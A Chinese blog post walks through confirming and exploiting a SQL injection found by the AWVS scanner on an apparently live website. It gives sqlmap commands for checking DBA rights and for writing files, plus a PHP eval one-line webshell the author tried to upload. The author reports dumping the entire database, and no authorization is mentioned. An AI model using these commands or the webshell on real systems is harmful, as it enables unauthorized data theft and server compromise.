irpas技术客

复现awvs——sql注入漏洞(报错注入加时间盲注)_萧风

irpas 5643

警告

请勿使用本文提到的内容违反法律。 本文不提供任何担保。


一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。

按变量类型分:

? 数字型

? 字符型

按 HTTP 提交方式分

? GET 注入

? POST 注入

? Cookie 注入

按注入方式分

? 报错注入

? 盲注

? 布尔盲注

? 时间盲注

? union 注入

编码问题

? 宽字节注入


二、awvs扫描结果

?初步判断可以看出是个时间盲注。
三、漏洞复现 放在bp进行尝试

发现的确是等待6秒后收到信息,可以判断百分之百存在了!

把它放到sqlmap进行一把梭,看不看能不能行

成功爆出数据库名,复现成功!

下面开始进行后渗透,看能不能拿到shell?

首先判断是不是权限,看是不是管理员权限

命令:sqlmap.py -u URL --is-dba? ? ? ? ? ? (--is-dba 判断权限)

可以看出是管理员权限,不过他是sql数据库,也是第一次遇到!?

sqlmap一把梭的时候也得出是报错注入,bp试一下能不能看到绝对路径

?巧了,运维人员把把着我的意,得到了网站的根目录了

本来用 --os-shell方式的? 这里我直接给舍去? 换种方式首先写个PHP一句话木马<?php eval($_REQUEST[xiaofeng]);?>? ?写进文档1.txt ,然后再把文档放进sqlmap的目录下就可以? ?xiaofeng是连接木马密码。

介绍两个函数:? --file-write(写入指定的文件)? 和? ? --file-dest(写入目标路径)

命令是: sqlmap.py -u URL --file-write 1.txt --file-dest?绝对路径1.php

结果出错了,试了好久也没成功,翻译一下看看?

?之前成功是基于mysql数据库,sql数据库也是第一次遇到,算了最后也放弃了,至少拿到了整个数据库资料,并且是管理员权限。
四、漏洞修复

严格过滤用户输入字符,修改数据库权限


警告

请勿使用本文提到的内容违反法律。 本文不提供任何担保。


1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,会注明原创字样,如未注明都非原创,如有侵权请联系删除!;3.作者投稿可能会经我们编辑修改或补充;4.本站不提供任何储存功能只提供收集或者投稿人的网盘链接。

标签: #本文不提供任何担保 #一sql注入介绍及分类sql #SQL #语句来进行攻击的技术 #按变量类型分